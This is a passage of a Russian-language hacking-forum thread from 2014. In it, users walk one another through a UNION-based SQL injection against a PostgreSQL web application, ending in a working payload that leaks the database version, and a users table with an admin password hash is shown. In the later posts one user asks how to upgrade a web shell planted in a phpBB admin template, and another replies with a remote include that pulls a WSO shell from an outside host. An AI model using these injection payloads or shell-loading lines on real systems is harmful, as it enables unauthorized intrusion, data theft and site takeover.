Старый 16.06.2014, 14:39   #3251
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

faza02, возможно инъекция в нескольких запросах с разным кол-вом колонок. Запрос типа:
Код:
';SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null                      
работает вне зависимости от числа полей в исходном. Посмотрите, будет ли ошибка при таком запросе:
Код:
' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null where 1=0--                      
Если да, то вероятно так и есть. В этом скрипте нет WAF?

Последний раз редактировалось NameSpace; 16.06.2014 в 14:48..
NameSpace вне форума   Ответить с цитированием
Старый 16.06.2014, 15:09   #3252
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

NameSpace, спасибо.
WAF нет точно. и запрос
Код:
' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null where 1=0--
отработал корректно

upd: нашел еще инъекцию, где только одно поле. на
Код:
' UNION SELECT null--
срабатывает, с
Код:
' AND 1=2 UNION SELECT null--
тоже, причем точно так же. возможно такое, что при ответе базы, скрипт не понимает формат ответа и выводит стандартный ответ?

Последний раз редактировалось faza02; 16.06.2014 в 15:37..
faza02 вне форума   Ответить с цитированием
Старый 16.06.2014, 15:52   #3253
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

faza02, Все может быть. Это одна и та же инъекция или другая, проходящая через этот скрипт? Если ваше предположение верно, скрипт может не распознать ответ с пустыми полями. Попробуйте такой запрос:
Код:
' and (1<0); --
Кстати, в первой инъекции вы не пробовали сделать WHERE ложным. Дело может быть именно в этом.
Код:
' and (1<0) UNION SELECT null,null,null,null,null,null,null,null,null,nul,null,null,null,null --                      

Последний раз редактировалось NameSpace; 16.06.2014 в 16:01..
NameSpace вне форума   Ответить с цитированием
Старый 16.06.2014, 16:07   #3254
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

NameSpace, ошибок нет. одинаковый ответ на 1<0, 1=1 и т. д.
кстати, если что, есть локальный доступ к базе, поэтому могу посмотреть, если что-то нужно.
спасибо

upd: да, база одна из немногих и доступа к коду нет. запрос целиком я могу посмотреть, как и сами данные, но интересна возможная эксплуатация

Последний раз редактировалось faza02; 16.06.2014 в 16:35..
faza02 вне форума   Ответить с цитированием
Старый 16.06.2014, 16:19   #3255
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
кстати, если что, есть локальный доступ к базе, поэтому могу посмотреть, если что-то нужно.
То есть инъекция проводится к вашей же базе? Тогда зачем её проводить, если можно сразу все посмотреть? Или ваша база одна из многих? Если что и надо посмотреть - запросы, которые проводятся и дампы таблиц, к которым они проводятся.

upd:
Цитата:
upd: да, база одна из немногих и доступа к коду нет. запрос целиком я могу посмотреть, как и сами данные, но интересна возможная эксплуатация
Запрос и сами данные (со структурой) в студию!

Последний раз редактировалось NameSpace; 16.06.2014 в 16:42..
NameSpace вне форума   Ответить с цитированием
Старый 18.06.2014, 11:34   #3256
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

NameSpace, извини, не увидел ответ. запрос выглядит так:
Код:
SELECT * FROM users WHERE state = 0 AND login LIKE '%a%';
структура:
Код:
 user_id | group_id | login | rights |             md5_hash             | first_name | last_name | state | home_folder_id | role_id | agency_id |     start_time      |      stop_time      | extra_info 
---------+----------+-------+--------+----------------------------------+------------+-----------+-------+----------------+---------+-----------+---------------------+---------------------+------------
       1 |        1 | admin |     -1 | 19a2854144b63a8f7617a6f225019b12 |            |           |     0 |              1 |       0 |         0 | 2013-01-19 06:14:07 | 2038-01-19 06:14:07 |
то есть по сути, запрос
Код:
select * from users where state = 0 and login like '%a%' and 1 = 2 union select 1,2,null,3,null,null,null,4,5,6,7,null,null,null;
должен быть верным, однако…

Последний раз редактировалось faza02; 18.06.2014 в 11:46..
faza02 вне форума   Ответить с цитированием
Старый 18.06.2014, 12:49   #3257
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
NameSpace, извини, не увидел ответ. запрос выглядит так:
Код:
SELECT * FROM users WHERE state = 0 AND login LIKE '%a%';
структура:
Код:
 user_id | group_id | login | rights |             md5_hash             | first_name | last_name | state | home_folder_id | role_id | agency_id |     start_time      |      stop_time      | extra_info 
---------+----------+-------+--------+----------------------------------+------------+-----------+-------+----------------+---------+-----------+---------------------+---------------------+------------
       1 |        1 | admin |     -1 | 19a2854144b63a8f7617a6f225019b12 |            |           |     0 |              1 |       0 |         0 | 2013-01-19 06:14:07 | 2038-01-19 06:14:07 |
то есть по сути, запрос
Код:
select * from users where state = 0 and login like '%a%' and 1 = 2 union select 1,2,null,3,null,null,null,4,5,6,7,null,null,null;
должен быть верным, однако…

Однако что? Попробуйте добавить одно поле в union-запрос. Если вывод изменится, а в первом случае отсутствие вывода union-запроса, то это классическая слепая инъекция. Также возможен stacked-вектор, в зависимости от типа используемого api.
madhatter вне форума   Ответить с цитированием
Старый 18.06.2014, 13:02   #3258
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

было одно предположение, что скрипту посредине не нравятся возвращаемые от базы данные с мои запросом. сделал копию запроса профиля админа, и вуаля:
Код:
' and 1=2 union select 12,1,version(),-1,null,null,null,0,1,0,0,'2013-01-19 06:14:07','2013-01-19 06:14:07',null--
в ответе получил, что хотел
Код:
{"users":[{"UserId":12,"Login":"PostgreSQL 8.4.13 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.4.6 20120305 (Red Hat 4.4.6-4), 64-bit","FirstName":null,"LastName":null,"Role":null,"RoleId":0,"State":0,"StartTime":"\/Date(1358561647000)\/","StopTime":"\/Date(1358561647000)\/","AgencyId":0,"Agency":"Администраторы","ExtraInfo":null}],"disableState":false}
всем больше спасибо!

Последний раз редактировалось faza02; 18.06.2014 в 13:06..
faza02 вне форума   Ответить с цитированием
Старый 20.06.2014, 23:03   #3259
Nyashka
 
Регистрация: 03.03.2014
Сообщений: 12
Репутация: 0
По умолчанию

есть админка в phpbb залил мини шелл в шаблон , но шелл не заливается(выполнение phpinfo работает) , пробивал так, copy("http://сайт/shall.txt","файл.php"); , и множество других. Так же в base64 кодировал , не помогает, как залить шелл? Или как сделать бекконект? Спасибо. Есть доступ к phpinfo, на какие данные смотреть?
Nyashka вне форума   Ответить с цитированием
Старый 20.06.2014, 23:08   #3260
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от Nyashka Посмотреть сообщение
есть админка в phpbb залил мини шелл в шаблон , но шелл не заливается(выполнение phpinfo работает) , пробивал так, copy("http://сайт/shall.txt","файл.php"); , и множество других. Так же в base64 кодировал , не помогает, как залить шелл? Или как сделать бекконект? Спасибо. Есть доступ к phpinfo, на какие данные смотреть?
Попробуй проинклудить
<?php include("http://www.onlineauction.com/tmp/test/wso.txt"); ?>
kingbeef вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot